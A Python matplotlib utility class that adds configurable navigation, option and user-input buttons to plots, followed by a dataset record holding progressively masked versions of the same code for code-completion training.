"'button_actions' must be the same length as 'button_labels")
self.num_buttons = len(self.button_labels)
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = 'supported. \n Currently supported actions are: \n'
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
def create_buttons(self, width=0.2):
"""
Create a set of buttons along the bottom axis of the figure
Need to re-write this to be generic based on used input
(might not be possible as user need to define events)
:param N: int, Number of buttons, default 3
:param width: float, width of the buttons in x, must be less than
1.0/N
:return:
"""
b_N, b_length = self.num_buttons, width
b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)
for b in range(b_N):
start = (b + 1) * b_sep + b * b_length
r = [start, 0.05, b_length, 0.075]
self.regions.append(r)
plt.subplots_adjust(bottom=0.25)
for b in range(b_N):
axbutton = plt.axes(self.regions[b])
button = Button(axbutton, self.button_labels[b])
button.on_clicked(self.actions[self.button_actions[b]])
self.buttons.append(button)
def next(self, event):
"""
Event for clicking a button with action "NEXT"
Sets self.result to 1
:param event:
:return:
"""
self.result = 1
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval, maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue, minvalue
=minval, maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
x, y = event.x, event.y
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
for r, rn in enumerate(self.regions):
rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width,
(rn[1] + rn[3]) * height]
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
<|reserved_special_token_0|>
<|reserved_special_token_1|>
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on 17/02/17 at 11:48 PM
@author: neil
Program description here
Version 0.0.1
"""
import matplotlib.pyplot as plt
from matplotlib.widgets import Button
import sys
# detect python version
# if python 3 do this:
if (sys.version_info > (3, 0)):
import tkinter
import tkinter.simpledialog as tksimpledialog
else:
import Tkinter as tkinter
import tkSimpleDialog as tksimpledialog
# =============================================================================
# Define Class. Methods and Functions
# =============================================================================
class Add_Buttons(object):
def __init__(self, ax=None, **kwargs):
"""
Adds a select rectangle feature to any matplotlib axis, with select,
clear all, and finish buttons
:param ax: matplotlib axis, the frame to add the selector to
:param kwargs: kwargs passed to the rectangle selector
Current allowed kwargs are:
button_labels - list of strings
defines the name of each button to be displayed
Must be of length 1 or greater
button_actions - list of strings
defines the action of each button. Must be same
length as button_labels
currently supported actions are:
"NEXT" - sends a return statement to move to
next plot
self.result set to 1
"PREVIOUS" - sends a return statement to move to
previous plot
self.result set to -1
"CLOSE" - closes the plot
"OPTION" - sends the button_label string
self.result set to button_label
"UINPUT" - asks user for an input
button_params - list of dictionaries (optional)
if defined must be same length as button_labels
a dictionary for each button
keywords of each dictionary:
"close" - when used with "OPTION" action will
close the plot after OPTION is clicked
"""
# set supported actions (and link to function)
self.actions = dict(NEXT=self.next,
PREVIOUS=self.previous,
CLOSE=self.end,
OPTION=self.option,
UINPUT=self.uinput)
self.supported_actions = list(self.actions.keys())
# current button params
self.buttons = []
self.regions = []
# result (1, 0, -1, or string)
self.result = 0
# storage
self.data = dict()
# Deal with having no matplotlib axis
if ax is None:
self.ax = plt.gca()
else:
self.ax = ax
# load keyword arguments
if kwargs is None:
kwargs = dict()
self.button_labels = kwargs.get('button_labels', ['Close'])
self.num_buttons = len(self.button_labels)
self.button_actions = kwargs.get('button_actions', ['CLOSE'])
dparams = [dict()]*self.num_buttons
self.button_params = kwargs.get('button_params', dparams)
# check inputs are correct
self.validate_inputs()
# create buttons
self.create_buttons()
def validate_inputs(self):
# Make sure button labels is in correct format
try:
self.button_labels = list(self.button_labels)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError("Button labels must be a list of strings")
# Make sure button actions is in correct format
try:
self.button_actions = list(self.button_actions)
for it in self.button_labels:
if type(it) != str:
raise TypeError()
except TypeError:
raise TypeError("Button labels must be a list of strings")
# Make sure button actions is in correct format
try:
self.button_actions = list(self.button_actions)
for it in self.button_params:
if type(it) != dict:
raise TypeError()
except TypeError:
raise TypeError("Button params must be a dictionary")
# Make sure list are not empty and same length
if len(self.button_labels) < 1:
raise ValueError("'button_labels' Must have at least one button "
"label in list.")
if len(self.button_actions) != len(self.button_labels):
raise ValueError("'button_actions' must be the same length "
"as 'button_labels")
self.num_buttons = len(self.button_labels)
# Make sure all button actions are supported
sstr = self.supported_actions[0]
for it in range(len(self.supported_actions)):
if it > 0:
sstr += ', {0}'.format(self.supported_actions[it])
for it in range(len(self.button_actions)):
e1 = "Action '{0}' not currently".format(self.button_actions[it])
e2 = "supported. \n Currently supported actions are: \n"
if self.button_actions[it] not in self.supported_actions:
raise ValueError(e1 + e2 + sstr)
def create_buttons(self, width=0.2):
"""
Create a set of buttons along the bottom axis of the figure
Need to re-write this to be generic based on used input
(might not be possible as user need to define events)
:param N: int, Number of buttons, default 3
:param width: float, width of the buttons in x, must be less than
1.0/N
:return:
"""
b_N, b_length = self.num_buttons, width
b_sep = (1. / (b_N + 1)) * (1 - b_N * b_length)
for b in range(b_N):
start = (b + 1) * b_sep + b * b_length
r = [start, 0.05, b_length, 0.075]
self.regions.append(r)
# adjust the figure
plt.subplots_adjust(bottom=0.25)
# populate buttons
for b in range(b_N):
axbutton = plt.axes(self.regions[b])
button = Button(axbutton, self.button_labels[b])
button.on_clicked(self.actions[self.button_actions[b]])
self.buttons.append(button)
def next(self, event):
"""
Event for clicking a button with action "NEXT"
Sets self.result to 1
:param event:
:return:
"""
self.result = 1
def previous(self, event):
"""
Event for clicking a button with action "PREVIOUS"
Sets self.result to -1
:param event:
:return:
"""
self.result = -1
def option(self, event):
"""
Event for clicking a button with action "OPTION"
Sets self.result to button_label[i] where i is the position in
button_label and button_action of the button clicked
:param event:
:return:
"""
pos = self.button_region(event)
if pos is not None:
self.result = self.button_labels[pos]
close = self.button_params[pos].get('close', False)
func = self.button_params[pos].get('func', None)
if func is not None:
func()
if close:
plt.close()
def uinput(self, event):
pos = self.button_region(event)
if pos is not None:
props = self.button_params[pos]
title = props.get('title', 'Enter a Value')
startvalue = props.get('comment', 'Message')
name = props.get('name', 'x')
fmt = props.get('fmt', None)
minval = props.get('minval', None)
maxval = props.get('maxval', None)
root = tkinter.Tk()
root.withdraw()
if fmt == int:
value = tksimpledialog.askinteger(title, startvalue,
minvalue=minval,
maxvalue=maxval)
elif fmt == float:
value = tksimpledialog.askfloat(title, startvalue,
minvalue=minval,
maxvalue=maxval)
else:
value = tksimpledialog.askstring(title, startvalue)
self.data[name] = value
root.destroy()
def end(self, event):
"""
Event for clicking the finish button - closes the graph
:param event: event passed to function
:return:
"""
plt.close()
def button_region(self, event):
if len(self.regions) == 0:
return None
# get mouse click location in pixels
x, y = event.x, event.y
# get the current canvas width and height (in pixels)
width = event.canvas.geometry().width()
height = event.canvas.geometry().height()
# loop round each button region
for r, rn in enumerate(self.regions):
# convert region to pixels
rn1 = [rn[0]*width, rn[1]*height,
(rn[0] + rn[2])*width, (rn[1] + rn[3])*height]
# test whether x, y are in region
cond1 = (x > rn1[0]) & (x < rn1[2])
cond2 = (y > rn1[1]) & (y < rn1[3])
if cond1 and cond2:
return r
return None
# =============================================================================
# Start of code
# =============================================================================
# Main code to test the rectangle selector
if __name__ == '__main__':
import numpy as np
# plt.close()
# fig, frame = plt.subplots(ncols=1, nrows=1)
# x = np.random.rand(100)
# y = np.random.rand(100)
# plt.scatter(x, y, color='k', marker='o', s=20)
# odict = dict(close=True)
# a = Add_Buttons(ax=frame,
# button_labels=['A', 'B'],
# button_actions=['OPTION', 'OPTION'],
# button_params=[odict, odict])
# plt.show()
# plt.close()
plt.close()
fig, frame = plt.subplots(ncols=1, nrows=1)
x = np.random.rand(100)
y = np.random.rand(100)
plt.scatter(x, y, color='k', marker='o', s=20)
odict = dict(close=True)
udict = dict(name='x', fmt=int, title='Enter value',
comment='Please enter x in meters.', minval=4, maxval=10)
a = Add_Buttons(ax=frame,
button_labels=['Enter value', 'Close'],
button_actions=['UINPUT', 'OPTION'],
button_params=[udict, odict])
plt.show()
plt.close()
# =============================================================================
# End of code
# =============================================================================
|
flexible
|
{
"blob_id": "1576693264a334153c2752ab6b3b4b65daa7c37c",
"index": 8928,
"step-1": "<mask token>\n\n\nclass Add_Buttons(object):\n <mask token>\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n <mask token>\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n <mask token>\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n <mask token>\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-4": "<mask token>\n\n\nclass Add_Buttons(object):\n\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n self.actions = dict(NEXT=self.next, PREVIOUS=self.previous, CLOSE=\n self.end, OPTION=self.option, UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n self.buttons = []\n self.regions = []\n self.result = 0\n self.data = dict()\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', ['Close'])\n self.num_buttons = len(self.button_labels)\n self.button_actions = kwargs.get('button_actions', ['CLOSE'])\n dparams = [dict()] * self.num_buttons\n self.button_params = kwargs.get('button_params', dparams)\n self.validate_inputs()\n self.create_buttons()\n\n def validate_inputs(self):\n try:\n self.button_labels = list(self.button_labels)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_labels:\n if type(it) != str:\n raise TypeError()\n except TypeError:\n raise TypeError('Button labels must be a list of strings')\n try:\n self.button_actions = list(self.button_actions)\n for it in self.button_params:\n if type(it) != dict:\n raise TypeError()\n except TypeError:\n raise TypeError('Button params must be a dictionary')\n if len(self.button_labels) < 1:\n raise ValueError(\n \"'button_labels' Must have at least one button label in list.\")\n if len(self.button_actions) != len(self.button_labels):\n raise ValueError(\n \"'button_actions' must be the same length as 'button_labels\")\n self.num_buttons = len(self.button_labels)\n sstr = self.supported_actions[0]\n for it in range(len(self.supported_actions)):\n if it > 0:\n sstr += ', {0}'.format(self.supported_actions[it])\n for it in range(len(self.button_actions)):\n e1 = \"Action '{0}' not currently\".format(self.button_actions[it])\n e2 = 'supported. \\n Currently supported actions are: \\n'\n if self.button_actions[it] not in self.supported_actions:\n raise ValueError(e1 + e2 + sstr)\n\n def create_buttons(self, width=0.2):\n \"\"\"\n Create a set of buttons along the bottom axis of the figure\n\n Need to re-write this to be generic based on used input\n (might not be possible as user need to define events)\n\n :param N: int, Number of buttons, default 3\n :param width: float, width of the buttons in x, must be less than\n 1.0/N\n :return:\n \"\"\"\n b_N, b_length = self.num_buttons, width\n b_sep = 1.0 / (b_N + 1) * (1 - b_N * b_length)\n for b in range(b_N):\n start = (b + 1) * b_sep + b * b_length\n r = [start, 0.05, b_length, 0.075]\n self.regions.append(r)\n plt.subplots_adjust(bottom=0.25)\n for b in range(b_N):\n axbutton = plt.axes(self.regions[b])\n button = Button(axbutton, self.button_labels[b])\n button.on_clicked(self.actions[self.button_actions[b]])\n self.buttons.append(button)\n\n def next(self, event):\n \"\"\"\n Event for clicking a button with action \"NEXT\"\n \n Sets self.result to 1\n \n :param event: \n :return: \n \"\"\"\n self.result = 1\n\n def previous(self, event):\n \"\"\"\n Event for clicking a button with action \"PREVIOUS\"\n\n Sets self.result to -1\n\n :param event: \n :return: \n \"\"\"\n self.result = -1\n\n def option(self, event):\n \"\"\"\n Event for clicking a button with action \"OPTION\"\n\n Sets self.result to button_label[i] where i is the position in\n button_label and button_action of the button clicked\n\n :param event: \n :return: \n \"\"\"\n pos = self.button_region(event)\n if pos is not None:\n self.result = self.button_labels[pos]\n close = self.button_params[pos].get('close', False)\n func = self.button_params[pos].get('func', None)\n if func is not None:\n func()\n if close:\n plt.close()\n\n def uinput(self, event):\n pos = self.button_region(event)\n if pos is not None:\n props = self.button_params[pos]\n title = props.get('title', 'Enter a Value')\n startvalue = props.get('comment', 'Message')\n name = props.get('name', 'x')\n fmt = props.get('fmt', None)\n minval = props.get('minval', None)\n maxval = props.get('maxval', None)\n root = tkinter.Tk()\n root.withdraw()\n if fmt == int:\n value = tksimpledialog.askinteger(title, startvalue,\n minvalue=minval, maxvalue=maxval)\n elif fmt == float:\n value = tksimpledialog.askfloat(title, startvalue, minvalue\n =minval, maxvalue=maxval)\n else:\n value = tksimpledialog.askstring(title, startvalue)\n self.data[name] = value\n root.destroy()\n\n def end(self, event):\n \"\"\"\n Event for clicking the finish button - closes the graph\n\n :param event: event passed to function\n :return:\n \"\"\"\n plt.close()\n\n def button_region(self, event):\n if len(self.regions) == 0:\n return None\n x, y = event.x, event.y\n width = event.canvas.geometry().width()\n height = event.canvas.geometry().height()\n for r, rn in enumerate(self.regions):\n rn1 = [rn[0] * width, rn[1] * height, (rn[0] + rn[2]) * width, \n (rn[1] + rn[3]) * height]\n cond1 = (x > rn1[0]) & (x < rn1[2])\n cond2 = (y > rn1[1]) & (y < rn1[3])\n if cond1 and cond2:\n return r\n return None\n\n\n<mask token>\n",
"step-5": "#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on 17/02/17 at 11:48 PM\n\n@author: neil\n\nProgram description here\n\nVersion 0.0.1\n\"\"\"\n\nimport matplotlib.pyplot as plt\nfrom matplotlib.widgets import Button\nimport sys\n# detect python version\n# if python 3 do this:\nif (sys.version_info > (3, 0)):\n import tkinter\n import tkinter.simpledialog as tksimpledialog\nelse:\n import Tkinter as tkinter\n import tkSimpleDialog as tksimpledialog\n\n# =============================================================================\n# Define Class. Methods and Functions\n# =============================================================================\nclass Add_Buttons(object):\n def __init__(self, ax=None, **kwargs):\n \"\"\"\n Adds a select rectangle feature to any matplotlib axis, with select,\n clear all, and finish buttons\n\n :param ax: matplotlib axis, the frame to add the selector to\n :param kwargs: kwargs passed to the rectangle selector\n\n Current allowed kwargs are:\n\n button_labels - list of strings\n defines the name of each button to be displayed\n Must be of length 1 or greater\n \n button_actions - list of strings\n defines the action of each button. Must be same\n length as button_labels\n\n currently supported actions are:\n \n \"NEXT\" - sends a return statement to move to\n next plot \n self.result set to 1\n \n \"PREVIOUS\" - sends a return statement to move to\n previous plot\n self.result set to -1\n \n \"CLOSE\" - closes the plot\n \n \"OPTION\" - sends the button_label string\n self.result set to button_label\n \n \"UINPUT\" - asks user for an input\n\n button_params - list of dictionaries (optional)\n if defined must be same length as button_labels\n \n a dictionary for each button\n \n keywords of each dictionary:\n \n \"close\" - when used with \"OPTION\" action will\n close the plot after OPTION is clicked\n\n \"\"\"\n # set supported actions (and link to function)\n self.actions = dict(NEXT=self.next,\n PREVIOUS=self.previous,\n CLOSE=self.end,\n OPTION=self.option,\n UINPUT=self.uinput)\n self.supported_actions = list(self.actions.keys())\n # current button params\n self.buttons = []\n self.regions = []\n # result (1, 0, -1, or string)\n self.result = 0\n # storage\n self.data = dict()\n # Deal with having no matplotlib axis\n if ax is None:\n self.ax = plt.gca()\n else:\n self.ax = ax\n # load keyword arguments\n if kwargs is None:\n kwargs = dict()\n self.button_labels = kwargs.get('button_labels', 